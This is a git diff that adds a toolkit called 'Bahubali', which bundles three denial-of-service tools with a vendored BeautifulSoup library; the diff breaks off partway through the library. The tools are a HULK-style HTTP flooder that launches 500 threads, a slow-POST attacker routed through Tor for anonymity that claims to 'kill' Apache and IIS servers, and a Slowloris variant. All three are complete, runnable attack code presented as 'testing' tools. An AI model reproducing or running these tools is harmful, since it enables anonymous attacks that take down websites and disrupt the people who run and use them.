diff options
-rw-r--r-- | src/1.py | 153 | ||||
-rw-r--r-- | src/2.py | 185 | ||||
-rw-r--r-- | src/3.pl | 364 | ||||
-rw-r--r-- | src/BeautifulSoup.py | 2000 | ||||
-rw-r--r-- | src/BeautifulSoup.pyc | bin | 0 -> 68629 bytes | |||
-rw-r--r-- | src/bahubali | 99 | ||||
-rw-r--r-- | src/socks.py | 387 | ||||
-rw-r--r-- | src/socks.pyc | bin | 0 -> 15317 bytes | |||
-rw-r--r-- | src/terminal.py | 185 | ||||
-rw-r--r-- | src/terminal.pyc | bin | 0 -> 6885 bytes |
10 files changed, 3373 insertions, 0 deletions
diff --git a/src/1.py b/src/1.py new file mode 100644 index 0000000..b5cb921 --- /dev/null +++ b/src/1.py @@ -0,0 +1,153 @@ +# ----------------------------------------------------------------------------------------------
+# Bahubali Tool No 1
+#
+# Based on Hulk by Barry
+#
+# By: N3V0N
+# ----------------------------------------------------------------------------------------------
+import urllib2
+import sys
+import threading
+import random
+import re
+
+#global params
+url=''
+host=''
+headers_useragents=[]
+headers_referers=[]
+request_counter=0
+flag=0
+safe=0
+
+def inc_counter():
+ global request_counter
+ request_counter+=1
+
+def set_flag(val):
+ global flag
+ flag=val
+
+def set_safe():
+ global safe
+ safe=1
+
+# generates a user agent array
+def useragent_list():
+ global headers_useragents
+ headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
+ headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
+ headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
+ headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
+ headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
+ headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
+ headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
+ headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
+ headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
+ headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
+ headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
+ headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
+ return(headers_useragents)
+
+# generates a referer array
+def referer_list():
+ global headers_referers
+ headers_referers.append('http://www.google.com/?q=')
+ headers_referers.append('http://www.usatoday.com/search/results?q=')
+ headers_referers.append('http://engadget.search.aol.com/search?q=')
+ headers_referers.append('http://' + host + '/')
+ return(headers_referers)
+
+#builds random ascii string
+def buildblock(size):
+ out_str = ''
+ for i in range(0, size):
+ a = random.randint(65, 90)
+ out_str += chr(a)
+ return(out_str)
+
+def usage():
+ print '---------------------------------------------------'
+ print 'USAGE: python hulk.py <url>'
+ print 'you can add "safe" after url, to autoshut after dos'
+ print '---------------------------------------------------'
+
+
+#http request
+def httpcall(url):
+ useragent_list()
+ referer_list()
+ code=0
+ if url.count("?")>0:
+ param_joiner="&"
+ else:
+ param_joiner="?"
+ request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
+ request.add_header('User-Agent', random.choice(headers_useragents))
+ request.add_header('Cache-Control', 'no-cache')
+ request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
+ request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
+ request.add_header('Keep-Alive', random.randint(110,120))
+ request.add_header('Connection', 'keep-alive')
+ request.add_header('Host',host)
+ try:
+ urllib2.urlopen(request)
+ except urllib2.HTTPError, e:
+ #print e.code
+ set_flag(1)
+ print 'Response Code 500'
+ code=500
+ except urllib2.URLError, e:
+ #print e.reason
+ sys.exit()
+ else:
+ inc_counter()
+ urllib2.urlopen(request)
+ return(code)
+
+
+#http caller thread
+class HTTPThread(threading.Thread):
+ def run(self):
+ try:
+ while flag<2:
+ code=httpcall(url)
+ if (code==500) & (safe==1):
+ set_flag(2)
+ except Exception, ex:
+ pass
+
+# monitors http threads and counts requests
+class MonitorThread(threading.Thread):
+ def run(self):
+ previous=request_counter
+ while flag==0:
+ if (previous+100<request_counter) & (previous<>request_counter):
+ print "%d Requests Sent" % (request_counter)
+ previous=request_counter
+ if flag==2:
+ print "\n-- Attack Finished --"
+
+#execute
+if len(sys.argv) < 2:
+ usage()
+ sys.exit()
+else:
+ if sys.argv[1]=="help":
+ usage()
+ sys.exit()
+ else:
+ print "-- Attack Initiated --"
+ if len(sys.argv)== 3:
+ if sys.argv[2]=="safe":
+ set_safe()
+ url = sys.argv[1]
+ if url.count("/")==2:
+ url = url + "/"
+ m = re.search('http\://([^/]*)/?.*', url)
+ host = m.group(1)
+ for i in range(500):
+ t = HTTPThread()
+ t.start()
+ t = MonitorThread()
+ t.start()
diff --git a/src/2.py b/src/2.py new file mode 100644 index 0000000..eadcd39 --- /dev/null +++ b/src/2.py @@ -0,0 +1,185 @@ +#!/usr/bin/python + +""" +Bahubali Tool 2 - Slow POST Denial Of Service Testing Tool +Version 0.9 +Based on Tor's Hammer + +Tool No 2 is a slow post dos testing tool written in Python. +It runs through the Tor network to be anonymized. +Kills most unprotected web servers running Apache and IIS via a single instance. +Kills Apache 1.X and older IIS with ~128 threads. +Kills newer IIS and Apache 2.X with ~256 threads. +""" + +import os +import re +import time +import sys +import random +import math +import getopt +import socks +import string +import terminal + +from threading import Thread + +global stop_now +global term + +stop_now = False +term = terminal.TerminalController() + +useragents = [ + "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)", + "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)", + "Googlebot/2.1 (http://www.googlebot.com/bot.html)", + "Opera/9.20 (Windows NT 6.0; U; en)", + "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)", + "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)", + "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0", + "Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16", + "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)", # maybe not + "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13", + "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)", + "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", + "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", + "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)", + "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)", + "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8", + "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7", + "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", + "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", + "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)" +] + +class httpPost(Thread): + def __init__(self, host, port, tor): + Thread.__init__(self) + self.host = host + self.port = port + self.socks = socks.socksocket() + self.tor = tor + self.running = True + + def _send_http_post(self, pause=10): + global stop_now + + self.socks.send("POST / HTTP/1.1\r\n" + "Host: %s\r\n" + "User-Agent: %s\r\n" + "Connection: keep-alive\r\n" + "Keep-Alive: 900\r\n" + "Content-Length: 10000\r\n" + "Content-Type: application/x-www-form-urlencoded\r\n\r\n" % + (self.host, random.choice(useragents))) + + for i in range(0, 9999): + if stop_now: + self.running = False + break + p = random.choice(string.letters+string.digits) + print term.BOL+term.UP+term.CLEAR_EOL+"Posting: %s" % p+term.NORMAL + self.socks.send(p) + time.sleep(random.uniform(0.1, 3)) + + self.socks.close() + + def run(self): + while self.running: + while self.running: + try: + if self.tor: + self.socks.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050) + self.socks.connect((self.host, self.port)) + print term.BOL+term.UP+term.CLEAR_EOL+"Connected to host..."+ term.NORMAL + break + except Exception, e: + if e.args[0] == 106 or e.args[0] == 60: + break + print term.BOL+term.UP+term.CLEAR_EOL+"Error connecting to host..."+ term.NORMAL + time.sleep(1) + continue + + while self.running: + try: + self._send_http_post() + except Exception, e: + if e.args[0] == 32 or e.args[0] == 104: + print term.BOL+term.UP+term.CLEAR_EOL+"Thread broken, restarting..."+ term.NORMAL + self.socks = socks.socksocket() + break + time.sleep(0.1) + pass + +def usage(): + print "./1.py -t <target> [-r <threads> -p <port> -T -h]" + print " -t|--target <Hostname|IP>" + print " -r|--threads <Number of threads> Defaults to 256" + print " -p|--port <Web Server Port> Defaults to 80" + print " -h|--help Shows this help\n" + +def main(argv): + + try: + opts, args = getopt.getopt(argv, "hTt:r:p:", ["help", "tor", "target=", "threads=", "port="]) + except getopt.GetoptError: + usage() + sys.exit(-1) + + global stop_now + + target = '' + threads = 256 + tor = False + port = 80 + + for o, a in opts: + if o in ("-h", "--help"): + usage() + sys.exit(0) + if o in ("-T", "--tor"): + tor = True + elif o in ("-t", "--target"): + target = a + elif o in ("-r", "--threads"): + threads = int(a) + elif o in ("-p", "--port"): + port = int(a) + + if target == '' or int(threads) <= 0: + usage() + sys.exit(-1) + + print term.DOWN + term.RED + "/*" + term.NORMAL + print term.RED + " * Target: %s Port: %d" % (target, port) + term.NORMAL + print term.RED + " * Threads: %d Tor: %s" % (threads, tor) + term.NORMAL + print term.RED + " * Give 20 seconds without tor or 40 with before checking site" + term.NORMAL + print term.RED + " */" + term.DOWN + term.DOWN + term.NORMAL + + rthreads = [] + for i in range(threads): + t = httpPost(target, port, tor) + rthreads.append(t) + t.start() + + while len(rthreads) > 0: + try: + rthreads = [t.join(1) for t in rthreads if t is not None and t.isAlive()] + except KeyboardInterrupt: + print "\nShutting down threads...\n" + for t in rthreads: + stop_now = True + t.running = False + +if __name__ == "__main__": + print "\n/*" + print " *"+term.RED + " Bahubali Tool 2 "+term.NORMAL + print " * Slow POST DoS Testing Tool" + print " * Version 0.9" + print " * Anonymized via Tor" + print " */\n" + + main(sys.argv[1:]) + diff --git a/src/3.pl b/src/3.pl new file mode 100644 index 0000000..289a713 --- /dev/null +++ b/src/3.pl @@ -0,0 +1,364 @@ +#!/usr/bin/perl -w +use strict; +use IO::Socket::INET; +use IO::Socket::SSL; +use Getopt::Long; +use Config; + +$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors + +print <<EOTEXT; +Welcome to Bahubali Tool No 3, Based on Slowloris by Laera Loris +EOTEXT + +my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections ); +my ( $cache, $httpready, $method, $ssl, $rand, $tcpto ); +my $result = GetOptions( + 'shost=s' => \$shost, + 'dns=s' => \$host, + 'httpready' => \$httpready, + 'num=i' => \$connections, + 'cache' => \$cache, + 'port=i' => \$port, + 'https' => \$ssl, + 'tcpto=i' => \$tcpto, + 'test' => \$test, + 'timeout=i' => \$timeout, + 'version' => \$version, +); + +if ($version) { + print "Version 0.9\n"; + exit; +} + +unless ($host) { + print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n"; + print "\n\tType 'perldoc $0' for help with options.\n\n"; + exit; +} + +unless ($port) { + $port = 80; + print "Defaulting to port 80.\n"; +} + +unless ($tcpto) { + $tcpto = 5; + print "Defaulting to a 5 second tcp connection timeout.\n"; +} + +unless ($test) { + unless ($timeout) { + $timeout = 100; + print "Defaulting to a 100 second re-try timeout.\n"; + } + unless ($connections) { + $connections = 1000; + print "Defaulting to 1000 connections.\n"; + } +} + +my $usemultithreading = 0; +if ( $Config{usethreads} ) { + print "Multithreading enabled.\n"; + $usemultithreading = 1; + use threads; + use threads::shared; +} +else { + print "No multithreading capabilites found!\n"; + print "The tool will be slower than normal as a result.\n"; +} + +my $packetcount : shared = 0; +my $failed : shared = 0; +my $connectioncount : shared = 0; + +srand() if ($cache); + +if ($shost) { + $sendhost = $shost; +} +else { + $sendhost = $host; +} +if ($httpready) { + $method = "POST"; +} +else { + $method = "GET"; +} + +if ($test) { + my @times = ( "2", "30", "90", "240", "500" ); + my $totaltime = 0; + foreach (@times) { + $totaltime = $totaltime + $_; + } + $totaltime = $totaltime / 60; + print "Thie test could take up to $totaltime minutes.\n"; + + my $delay = 0; + my $working = 0; + my $sock; + + if ($ssl) { + if ( + $sock = new IO::Socket::SSL( + PeerAddr => "$host", + PeerPort => "$port", + Timeout => "$tcpto", + Proto => "tcp", + ) + ) + { + $working = 1; + } + } + else { + if ( + $sock = new IO::Socket::INET( + PeerAddr => "$host", + PeerPort => "$port", + Timeout => "$tcpto", + Proto => "tcp", + ) + ) + { + $working = 1; + } + } + if ($working) { + if ($cache) { + $rand = "?" . int( rand(99999999999999) ); + } + else { + $rand = ""; + } + my $primarypayload = + "GET /$rand HTTP/1.1\r\n" + . "Host: $sendhost\r\n" + . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" + . "Content-Length: 42\r\n"; + if ( print $sock $primarypayload ) { + print "Connection successful, now comes the waiting game...\n"; + } + else { + print +"That's odd - I connected but couldn't send the data to $host:$port.\n"; + print "Is something wrong?\nDying.\n"; + exit; + } + } + else { + print "Can't connect to $host:$port.\n"; + print "Is something wrong?\nDying.\n"; + exit; + } + for ( my $i = 0 ; $i <= $#times ; $i++ ) { + print "Trying a $times[$i] second delay: \n"; + sleep( $times[$i] ); + if ( print $sock "X-a: b\r\n" ) { + print "\tWorked.\n"; + $delay = $times[$i]; + } + else { + if ( $SIG{__WARN__} ) { + $delay = $times[ $i - 1 ]; + last; + } + print "\tFailed after $times[$i] seconds.\n"; + } + } + + if ( print $sock "Connection: Close\r\n\r\n" ) { + print "Okay that's enough time. Slowloris closed the socket.\n"; + print "Use $delay seconds for -timeout.\n"; + exit; + } + else { + print "Remote server closed socket.\n"; + print "Use $delay seconds for -timeout.\n"; + exit; + } + if ( $delay < 166 ) { + print <<EOSUCKS2BU; +Since the timeout ended up being so small ($delay seconds) and it generally +takes between 200-500 threads for most servers and assuming any latency at +all... you might have trouble using Slowloris against this target. You can +tweak the -timeout flag down to less than 10 seconds but it still may not +build the sockets in time. +EOSUCKS2BU + } +} +else { + print +"Connecting to $host:$port every $timeout seconds with $connections sockets:\n"; + + if ($usemultithreading) { + domultithreading($connections); + } + else { + doconnections( $connections, $usemultithreading ); + } +} + +sub doconnections { + my ( $num, $usemultithreading ) = @_; + my ( @first, @sock, @working ); + my $failedconnections = 0; + $working[$_] = 0 foreach ( 1 .. $num ); #initializing + $first[$_] = 0 foreach ( 1 .. $num ); #initializing + while (1) { + $failedconnections = 0; + print "\t\tBuilding sockets.\n"; + foreach my $z ( 1 .. $num ) { + if ( $working[$z] == 0 ) { + if ($ssl) { + if ( + $sock[$z] = new IO::Socket::SSL( + PeerAddr => "$host", + PeerPort => "$port", + Timeout => "$tcpto", + Proto => "tcp", + ) + ) + { + $working[$z] = 1; + } + else { + $working[$z] = 0; + } + } + else { + if ( + $sock[$z] = new IO::Socket::INET( + PeerAddr => "$host", + PeerPort => "$port", + Timeout => "$tcpto", + Proto => "tcp", + ) + ) + { + $working[$z] = 1; + $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK + } + else { + $working[$z] = 0; + } + } + if ( $working[$z] == 1 ) { + if ($cache) { + $rand = "?" . int( rand(99999999999999) ); + } + else { + $rand = ""; + } + my $primarypayload = + "$method /$rand HTTP/1.1\r\n" + . "Host: $sendhost\r\n" + . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" + . "Content-Length: 42\r\n"; + my $handle = $sock[$z]; + if ($handle) { + print $handle "$primarypayload"; + if ( $SIG{__WARN__} ) { + $working[$z] = 0; + close $handle; + $failed++; + $failedconnections++; + } + else { + $packetcount++; + $working[$z] = 1; + } + } + else { + $working[$z] = 0; + $failed++; + $failedconnections++; + } + } + else { + $working[$z] = 0; + $failed++; + $failedconnections++; + } + } + } + print "\t\tSending data.\n"; + foreach my $z ( 1 .. $num ) { + if ( $working[$z] == 1 ) { + if ( $sock[$z] ) { + my $handle = $sock[$z]; + if ( print $handle "X-a: b\r\n" ) { + $working[$z] = 1; + $packetcount++; + } + else { + $working[$z] = 0; + #debugging info + $failed++; + $failedconnections++; + } + } + else { + $working[$z] = 0; + #debugging info + $failed++; + $failedconnections++; + } + } + } + print +"Current stats:\tThe tool has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n"; + sleep($timeout); + } +} + +sub domultithreading { + my ($num) = @_; + my @thrs; + my $i = 0; + my $connectionsperthread = 50; + while ( $i < $num ) { + $thrs[$i] = + threads->create( \&doconnections, $connectionsperthread, 1 ); + $i += $connectionsperthread; + } + my @threadslist = threads->list(); + while ( $#threadslist > 0 ) { + $failed = 0; + } +} + +__END__ + +=head1 TITLE + +Bahubali Tool 3 by N3V0N + +=head1 VERSION + +Version 0.9 Stable + +=head1 DATE + +22/07/17 + +=head1 AUTHOR + +Navan Chauhan <navanchauhan@gmail.com> + +=head1 ABSTRACT + +Based on Slowloris + +=head1 AFFECTS + +Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...? + +=head1 NOT AFFECTED + +IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...? diff --git a/src/BeautifulSoup.py b/src/BeautifulSoup.py new file mode 100644 index 0000000..34204e7 --- /dev/null +++ b/src/BeautifulSoup.py @@ -0,0 +1,2000 @@ +"""Beautiful Soup +Elixir and Tonic +"The Screen-Scraper's Friend" +http://www.crummy.com/software/BeautifulSoup/ + +Beautiful Soup parses a (possibly invalid) XML or HTML document into a +tree representation. It provides methods and Pythonic idioms that make +it easy to navigate, search, and modify the tree. + +A well-formed XML/HTML document yields a well-formed data +structure. An ill-formed XML/HTML document yields a correspondingly +ill-formed data structure. If your document is only locally +well-formed, you can use this library to find and process the +well-formed part of it. + +Beautiful Soup works with Python 2.2 and up. It has no external +dependencies, but you'll have more success at converting data to UTF-8 +if you also install these three packages: + +* chardet, for auto-detecting character encodings + http://chardet.feedparser.org/ +* cjkcodecs and iconv_codec, which add more encodings to the ones supported + by stock Python. + http://cjkpython.i18n.org/ + +Beautiful Soup defines classes for two main parsing strategies: + + * BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific + language that kind of looks like XML. + + * BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid + or invalid. This class has web browser-like heuristics for + obtaining a sensible parse tree in the face of common HTML errors. + +Beautiful Soup also defines a class (UnicodeDammit) for autodetecting +the encoding of an HTML or XML document, and converting it to +Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser. + +For more than you ever wanted to know about Beautiful Soup, see the +documentation: +http://www.crummy.com/software/BeautifulSoup/documentation.html + +Here, have some legalese: + +Copyright (c) 2004-2009, Leonard Richardson + +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + + * Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + + * Redistributions in binary form must reproduce the above + copyright notice, this list of conditions and the following + disclaimer in the documentation and/or other materials provided + with the distribution. + + * Neither the name of the the Beautiful Soup Consortium and All + Night Kosher Bakery nor the names of its contributors may be + used to endorse or promote products derived from this software + without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR +CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, +EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, +PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR +PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF +LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING +NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT. + +""" +from __future__ import generators + +__author__ = "Leonard Richardson (leonardr@segfault.org)" +__version__ = "3.1.0.1" +__copyright__ = "Copyright (c) 2004-2009 Leonard Richardson" +__license__ = "New-style BSD" + +import codecs +import markupbase +import types +import re +from HTMLParser import HTMLParser, HTMLParseError +try: + from htmlentitydefs import name2codepoint +except ImportError: + name2codepoint = {} +try: + set +except NameError: + from sets import Set as set + +#These hacks make Beautiful Soup able to parse XML with namespaces +markupbase._declname_match = re.compile(r'[a-zA-Z][-_.:a-zA-Z0-9]*\s*').match + +DEFAULT_OUTPUT_ENCODING = "utf-8" + +# First, the classes that represent markup elements. + +def sob(unicode, encoding): + """Returns either the given Unicode string or its encoding.""" + if encoding is None: + return unicode + else: + return unicode.encode(encoding) + +class PageElement: + """Contains the navigational information for some part of the page + (either a tag or a piece of text)""" + + def setup(self, parent=None, previous=None): + """Sets up the initial relations between this element and + other elements.""" + self.parent = parent + self.previous = previous + self.next = None + self.previousSibling = None + self.nextSibling = None + if self.parent and self.parent.contents: + self.previousSibling = self.parent.contents[-1] + self.previousSibling.nextSibling = self + + def replaceWith(self, replaceWith): + oldParent = self.parent + myIndex = self.parent.contents.index(self) + if hasattr(replaceWith, 'parent') and replaceWith.parent == self.parent: + # We're replacing this element with one of its siblings. + index = self.parent.contents.index(replaceWith) + if index and index < myIndex: + # Furthermore, it comes before this element. That + # means that when we extract it, the index of this + # element will change. + myIndex = myIndex - 1 + self.extract() + oldParent.insert(myIndex, replaceWith) + + def extract(self): + """Destructively rips this element out of the tree.""" + if self.parent: + try: + self.parent.contents.remove(self) + except ValueError: + pass + + #Find the two elements that would be next to each other if + #this element (and any children) hadn't been parsed. Connect + #the two. + lastChild = self._lastRecursiveChild() + nextElement = lastChild.next + + if self.previous: + self.previous.next = nextElement + if nextElement: + nextElement.previous = self.previous + self.previous = None + lastChild.next = None + + self.parent = None + if self.previousSibling: + self.previousSibling.nextSibling = self.nextSibling + if self.nextSibling: + self.nextSibling.previousSibling = self.previousSibling + self.previousSibling = self.nextSibling = None + return self + + def _lastRecursiveChild(self): + "Finds the last element beneath this object to be parsed." + lastChild = self + while hasattr(lastChild, 'contents') and lastChild.contents: + lastChild = lastChild.contents[-1] + return lastChild + + def insert(self, position, newChild): + if (isinstance(newChild, basestring) + or isinstance(newChild, unicode)) \ + and not isinstance(newChild, NavigableString): + newChild = NavigableString(newChild) + + position = min(position, len(self.contents)) + if hasattr(newChild, 'parent') and newChild.parent != None: + # We're 'inserting' an element that's already one + # of this object's children. + if newChild.parent == self: + index = self.find(newChild) + if index and index < position: + # Furthermore we're moving it further down the + # list of this object's children. That means that + # when we extract this element, our target index + # will jump down one. + position = position - 1 + newChild.extract() + + newChild.parent = self + previousChild = None + if position == 0: + newChild.previousSibling = None + newChild.previous = self + else: + previousChild = self.contents[position-1] + newChild.previousSibling = previousChild + newChild.previousSibling.nextSibling = newChild + newChild.previous = previousChild._lastRecursiveChild() + if newChild.previous: + newChild.previous.next = newChild + + newChildsLastElement = newChild._lastRecursiveChild() + + if position >= len(self.contents): + newChild.nextSibling = None + + parent = self + parentsNextSibling = None + while not parentsNextSibling: + parentsNextSibling = parent.nextSibling + parent = parent.parent + if not parent: # This is the last element in the document. + break + if parentsNextSibling: + newChildsLastElement.next = parentsNextSibling + else: + newChildsLastElement.next = None + else: + nextChild = self.contents[position] + newChild.nextSibling = nextChild + if newChild.nextSibling: + newChild.nextSibling.previousSibling = newChild + newChildsLastElement.next = nextChild + + if newChildsLastElement.next: + newChildsLastElement.next.previous = newChildsLastElement + self.contents.insert(position, newChild) + + def append(self, tag): + """Appends the given tag to the contents of this tag.""" + self.insert(len(self.contents), tag) + + def findNext(self, name=None, attrs={}, text=None, **kwargs): + """Returns the first item that matches the given criteria and + appears after this Tag in the document.""" + return self._findOne(self.findAllNext, name, attrs, text, **kwargs) + + def findAllNext(self, name=None, attrs={}, text=None, limit=None, + **kwargs): + """Returns all items that match the given criteria and appear + after this Tag in the document.""" + return self._findAll(name, attrs, text, limit, self.nextGenerator, + **kwargs) + + def findNextSibling(self, name=None, attrs={}, text=None, **kwargs): + """Returns the closest sibling to this Tag that matches the + given criteria and appears after this Tag in the document.""" + return self._findOne(self.findNextSiblings, name, attrs, text, + **kwargs) + + def findNextSiblings(self, name=None, attrs={}, text=None, limit=None, + **kwargs): + """Returns the siblings of this Tag that match the given + criteria and appear after this Tag in the document.""" + return self._findAll(name, attrs, text, limit, + self.nextSiblingGenerator, **kwargs) + fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x + + def findPrevious(self, name=None, attrs={}, text=None, **kwargs): + """Returns the first item that matches the given criteria and + appears before this Tag in the document.""" + return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs) + + def findAllPrevious(self, name=None, attrs={}, text=None, limit=None, + **kwargs): + """Returns all items that match the given criteria and appear + before this Tag in the document.""" + return self._findAll(name, attrs, text, limit, self.previousGenerator, + **kwargs) + fetchPrevious = findAllPrevious # Compatibility with pre-3.x + + def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs): + """Returns the closest sibling to this Tag that matches the + given criteria and appears before this Tag in the document.""" + return self._findOne(self.findPreviousSiblings, name, attrs, text, + **kwargs) + + def findPreviousSiblings(self, name=None, attrs={}, text=None, + limit=None, **kwargs): + """Returns the siblings of this Tag that match the given + criteria and appear before this Tag in the document.""" + return self._findAll(name, attrs, text, limit, + self.previousSiblingGenerator, **kwargs) + fetchPreviousSiblings = findPreviousSiblings # Compatibility with pre-3.x + + def findParent(self, name=None, attrs={}, **kwargs): + """Returns the closest parent of this Tag that matches the given + criteria.""" + # NOTE: We can't use _findOne because findParents takes a different + # set of arguments. + r = None + l = self.findParents(name, attrs, 1) + if l: + r = l[0] + return r + + def findParents(self, name=None, attrs={}, limit=None, **kwargs): + """Returns the parents of this Tag that match the given + criteria.""" + + return self._findAll(name, attrs, None, limit, self.parentGenerator, + **kwargs) + fetchParents = findParents # Compatibility with pre-3.x + + #These methods do the real heavy lifting. + + def _findOne(self, method, name, attrs, text, **kwargs): + r = None + l = method(name, attrs, text, 1, **kwargs) + if l: + r = l[0] + return r + + def _findAll(self, name, attrs, text, limit, generator, **kwargs): + "Iterates over a generator looking for things that match." + + if isinstance(name, SoupStrainer): + strainer = name + else: + # Build a SoupStrainer + strainer = SoupStrainer(name, attrs, text, **kwargs) + results = ResultSet(strainer) + g = generator() + while True: + try: + i = g.next() + except StopIteration: + break + if i: + found = strainer.search(i) + if found: + results.append(found) + if limit and len(results) >= limit: + break + return results + + #These Generators can be used to navigate starting from both + #NavigableStrings and Tags. + def nextGenerator(self): + i = self + while i: + i = i.next + yield i + + def nextSiblingGenerator(self): + i = self + while i: + i = i.nextSibling + yield i + + def previousGenerator(self): + i = self + while i: + i = i.previous + yield i + + def previousSiblingGenerator(self): + i = self + while i: + i = i.previousSibling + yield i + + def parentGenerator(self): + i = self + while i: + i = i.parent + yield i + + # Utility methods + def substituteEncoding(self, str, encoding=None): + encoding = encoding or "utf-8" + return str.replace("%SOUP-ENCODING%", encoding) + + def toEncoding(self, s, encoding=None): + """Encodes an object to a string in some encoding, or to Unicode. + .""" + if isinstance(s, unicode): + if encoding: + s = s.encode(encoding) + elif isinstance(s, str): + if encoding: + s = s.encode(encoding) + else: + s = unicode(s) + else: + if encoding: + s = self.toEncoding(str(s), encoding) + else: + s = unicode(s) + return s + +class 